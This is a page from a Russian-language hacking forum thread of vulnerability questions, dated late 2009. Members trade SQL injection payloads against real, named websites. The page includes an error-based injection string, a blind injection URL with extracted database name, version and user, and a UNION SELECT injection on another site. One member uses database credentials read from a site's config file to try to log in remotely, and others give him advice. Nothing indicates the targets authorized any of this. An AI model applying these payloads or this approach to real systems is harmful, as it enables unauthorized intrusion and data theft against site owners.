ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1104 из 1393 « Первая < 104604100410541094 1100 1101 1102 1103 1104 1105 1106 1107 1108 111411541204 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #11031  
Старый 31.12.2009, 02:02
KNR
Новичок
Регистрация: 30.10.2009
Сообщений: 21
Провел на форуме:
182669

Репутация: 24
По умолчанию
Цитата:
character=12589)+and+1=(select+*+from(select+*+fro m(select+name_const((version()),14)d)+as+t+join+(s elect+name_const((version()),14)e)b)a)--+
Не совсем понял как работает эта inj (
 
Ответить с цитированием

  #11032  
Старый 31.12.2009, 04:31
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию
Встретился с такой проблеммой.
Прочитал конфиг одного сайта, есть логин и пасс от БД, сама БД находится на локалхосте, однако порт 3306 у этого сайта публично открыт, пытаюсь туда законнектиться и облом.
В чём может быть дело? Если порт открыт из веба, то и данные он на него по идее должен из веба принять...
 
Ответить с цитированием

  #11033  
Старый 31.12.2009, 05:34
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию
зависит от настроек удаленного доступа
 
Ответить с цитированием

  #11034  
Старый 31.12.2009, 07:49
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию
Значит, юзера user@% в БД не существует
 
Ответить с цитированием

  #11035  
Старый 31.12.2009, 08:55
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию
Цитата:
Сообщение от Nightmarе  
Встретился с такой проблеммой.
Прочитал конфиг одного сайта, есть логин и пасс от БД, сама БД находится на локалхосте, однако порт 3306 у этого сайта публично открыт, пытаюсь туда законнектиться и облом.
В чём может быть дело? Если порт открыт из веба, то и данные он на него по идее должен из веба принять...
то что порт открыт - не значит, что тебе туда можно
 
Ответить с цитированием

  #11036  
Старый 31.12.2009, 11:17
RedX
Познающий
Регистрация: 12.06.2008
Сообщений: 32
Провел на форуме:
324402

Репутация: 22
Отправить сообщение для RedX с помощью ICQ
По умолчанию
http://webantenne.com/radio_player_1.php?id=999'

Ошибка вылазит, но раскрутить не могу Оо
 
Ответить с цитированием

  #11037  
Старый 31.12.2009, 13:23
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию
Код:
http://webantenne.com/radio_player_1.php?id=-999+or+1=1+and+substring(version(),1,1)=3

----------------------------------
Blind MYsql system information:
----------------------------------
database(): db100436_1
version(): 3.23.58-log
user(): db100436_1@localhost

POST-method granted
 
Ответить с цитированием

  #11038  
Старый 31.12.2009, 17:18
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию
А вот значит ещё какая вещь у меня появляется.
Нахожу SQL иньекцию, и всё как по плану, подбираю нужное количество колонок и … приехали. Как только подобрал правильное кол-во столбцов, так сразу-же выскакивает ошибка:
Код:
 Unknown table 'codes' in field list
Вот SQL с примером:
http://catalogue.montevideo.nl/code.php?id=-1+union+select+1,2,3--
Количество столбцов точно 3, но ругается на неправильную таблицу и т.д… Эта ошибка встречается мне очень часто, собственно что тут можно сделать, почему так бывает, и реально ли вывести инфу из неё?
 
Ответить с цитированием

  #11039  
Старый 31.12.2009, 17:24
DeluxeS
Участник форума
Регистрация: 01.08.2009
Сообщений: 183
Провел на форуме:
1483264

Репутация: 131
По умолчанию
1)К примеру у вас 100 сайтов с .php?id=10
Сколько из них вы взломаете? Не получается у меня нифига =(

2)Как вы обнарижваете sql inj ? script.php?id=1+and+1=1
так ?
 
Ответить с цитированием

  #11040  
Старый 31.12.2009, 17:31
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию
Цитата:
Сообщение от DeluxeS  
1)К примеру у вас 100 сайтов с .php?id=10
Сколько из них вы взломаете? Не получается у меня нифига =(

2)Как вы обнарижваете sql inj ? script.php?id=1+and+1=1
так ?
Ох я ебал.Как в болталке тролить так мы в первое рыло,а как статьи почитать религия не позволяет?
Для каждого случая,отдельная диагностика,где то кавычка,где-то скобка.И нельзя вывести точную статистику сколько сайтов мы взломаем из 100, "благоприятные обстоятельства" нужны
 
Ответить с цитированием
Ответ
Страница 1104 из 1393 « Первая < 104604100410541094 1100 1101 1102 1103 1104 1105 1106 1107 1108 111411541204 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ